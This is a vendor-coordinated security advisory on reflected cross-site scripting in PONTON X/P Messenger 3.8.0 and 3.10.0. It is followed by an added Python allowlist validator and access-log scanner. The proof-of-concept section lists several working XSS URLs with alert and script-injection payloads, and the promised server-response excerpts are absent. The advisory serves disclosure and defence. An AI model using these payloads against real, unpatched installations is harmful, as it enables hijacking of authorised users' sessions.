Advisory ID: SYSS-2021-078
Product: PONTON X/P Messenger
Manufacturer: PONTON GmbH
Affected Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Tested Version(s): 3.8.0 (Build 201909201204), 3.10.0 (Build 202009171429)
Vulnerability Type: Reflected Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed in release of version 3.11.2
Manufacturer Notification: 2022-01-25
Solution Date: 2022-02-07
Public Disclosure: 2022-03-11
CVE Reference: CVE-2021-45889
Author of Advisory: Stefan Walter, Thibaud Kehler, Tarek Awadallah (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

> The PONTON X/P Messenger (or PONTON X/P for short) is PONTON's
> high-quality B2B integration solution with a proven track-record in
> several industries since 2001. PONTON X/P is a highly configurable
> ebXML, AS/1, AS/2, AS/3 and AS/4 compliant messaging software. It
> provides additional features to deal with typical B2B integration
> issues (such as a listener component for the DMZ, certificate
> management and non-repudiation of messages). PONTON X/P is typically
> used as communication layer in a business consortium or as an (OEM)
> communication extension of an existing software application.

The tested version was not the most recent one. The current versions 4.X are not affected.

The vulnerability can only be exploited by an authorised user of the Ponton X/P web UI, which is normally only accessible on the internal network.

The vulnerability is fixed in Ponton X/P version 3.11.2. Please upgrade to version 3.11.2.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Several functions are vulnerable to reflected cross-site scripting.
For testing purposes, a local installation was set up using the application binaries provided at [2] and the instructions at [3]:

$ wget 'https://www.ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip'
$ unzip PontonXP-Messenger-3.10.0-Linux.zip -d PontonXP-Messenger-3.10.0-Linux
$ cd PontonXP-Messenger-3.10.0-Linux
$ ./pontonxp start

Afterwards, the web application is reachable at https://localhost:8443.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH identified three different categories of reflected cross-site scripting.

The first category can be triggered by visiting, for example, the following URL:

https://localhost:8443/pontonxp/private/index.jsp?partners/ShowNonLocalPartners.do?localID=%27-prompt(%22SySS%20RXSS%20PoC%22)//

As can be seen in the following excerpt of the server response, the payload is injected directly into a JavaScript context:

The second category can be triggered by visiting the following URL:

https://localhost:8443/pontonxp/private/index.jsp?javascript:alert(%27SySS_RXSS_PoC%27)
As can be seen in the following excerpt of the server response, the payload is injected into the iframe src and then executed:

The third category can be triggered by visiting any one of the following URLs (the list is non-exhaustive):

* https://localhost:8443/pontonxp/private/index.jsp?database/databaseTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E
* https://localhost:8443/pontonxp/private/index.jsp?activation/activationMainTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E
* https://localhost:8443/pontonxp/private/index.jsp?communication/serverTab.jsp?syss%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E
* https://localhost:8443/pontonxp/private/index.jsp?emailNotification/notificationTab.jsp?ucbgm%22%3E%3C/iframe%3E%3Cscript%3Ealert(%22SySS%20RXSS%20PoC%22);%3C/script%3E

As can be seen in the following excerpt of the server response for the first request in the list, the payload is used to break out of the iframe src attribute and to execute code by inserting a new script tag:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vulnerability has been fixed with Ponton X/P version 3.11.2.
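The three categories above share one root cause: the text after index.jsp? is reflected, once into a JavaScript string, once as an iframe src and once into the src attribute without escaping. The following is an added example (not PONTON's code or the vendor's fix) of how a defender can validate that parameter against an allowlist of sub-pages, rebuild a safely escaped src, and classify suspicious requests in an access log; the allowlist, the log line format and the SAMPLE_LOG lines are constructed for illustration.

```python
# Added example for SYSS-2021-078, not PONTON's code; allowlist and log lines are constructed.
import html
import re
from urllib.parse import parse_qsl, unquote, urlencode

# Sub-pages the UI loads into its iframe: built from the paths named in the advisory.
ALLOWED_PAGES = {
    "partners/ShowNonLocalPartners.do", "database/databaseTab.jsp",
    "activation/activationMainTab.jsp", "communication/serverTab.jsp",
    "emailNotification/notificationTab.jsp",
}
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")  # javascript:, http:, ...
LOG_RE = re.compile(r'"GET /pontonxp/private/index\.jsp\?(\S*) HTTP')
SAMPLE_LOG = [  # constructed access-log lines: one benign, one category 2 probe
    '10.0.0.5 - admin [06/Dec/2021:10:00:00 +0100] "GET /pontonxp/private/index.jsp?database/databaseTab.jsp HTTP/1.1" 200 4321',
    '10.0.0.5 - admin [06/Dec/2021:10:00:07 +0100] "GET /pontonxp/private/index.jsp?javascript:alert(%27SySS_RXSS_PoC%27) HTTP/1.1" 200 4321',
]

def classify_target(raw_query: str) -> str:
    """Classify the text after 'index.jsp?': 'ok', or 'scheme' (category 2),
    'attribute-breakout' (category 3), 'script-breakout' (category 1) or
    'unknown-page' (sub-page not in the allowlist)."""
    decoded = unquote(raw_query)
    page, _, query = decoded.partition("?")
    if SCHEME_RE.match(page):            # whole target is a URL, e.g. javascript:
        return "scheme"
    if page not in ALLOWED_PAGES:
        return "unknown-page"
    if "<" in query or ">" in query:     # closes src="..." and the iframe tag
        return "attribute-breakout"
    if "'" in query or '"' in query:     # breaks out of a JS string literal
        return "script-breakout"
    return "ok"

def safe_iframe_src(raw_query: str):
    """Allowlisted page plus re-encoded sub-query, HTML-attribute-escaped; None = reject."""
    if classify_target(raw_query) != "ok":
        return None
    page, _, query = unquote(raw_query).partition("?")
    rebuilt = page + ("?" + urlencode(parse_qsl(query)) if query else "")
    return html.escape(rebuilt, quote=True)

def scan_access_log(lines):
    """Return [(category, line)] for index.jsp requests that are not benign."""
    found = [(classify_target(m.group(1)), line)
             for line in lines for m in [LOG_RE.search(line)] if m]
    return [hit for hit in found if hit[0] != "ok"]
```

Running scan_access_log(SAMPLE_LOG) flags only the second constructed line, as "scheme"; the same classifier can be applied to the three PoC URLs above to see each land in its own category.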
More information:
https://www.ponton.de/downloads/xp/3.11/documents/ReleaseNotes3112.pdf

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-12-06: Vulnerability discovered
2022-01-25: Vulnerability reported to manufacturer
2022-02-07: Fixed version 3.11.2 released by manufacturer
2022-03-11: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for PONTON X/P MESSENGER
    https://www.ponton.de/products/xpmessenger/
[2] PONTON X/P MESSENGER 3.10.0 download
    https://ponton.de/downloads/xp/3.10/PontonXP-Messenger-3.10.0-Linux.zip
[3] PONTON X/P MESSENGER 3.10.0 documentation
    https://ponton.de/downloads/xp/3.10/documents/MessengerDocumentation310.pdf
[4] SySS Security Advisory SYSS-2021-078
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-078.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Stefan Walter, Thibaud Kehler, and Tarek Awadallah of SySS GmbH.

E-Mail: stefan.walter@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Stefan_Walter.asc
Key Fingerprint: 74DD 77CD 0317 2777 470D 38BE BE0B B311 DA3F 3E16

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

E-Mail: tarek.awadallah@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tarek_Awadallah.asc
Key Fingerprint: 2F33 D0ED F453 D931 177B 847B 4F87 A6B9 28A6 61F0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind.
Details of this security advisory may be updated in order to provide information that is as accurate as possible. The latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en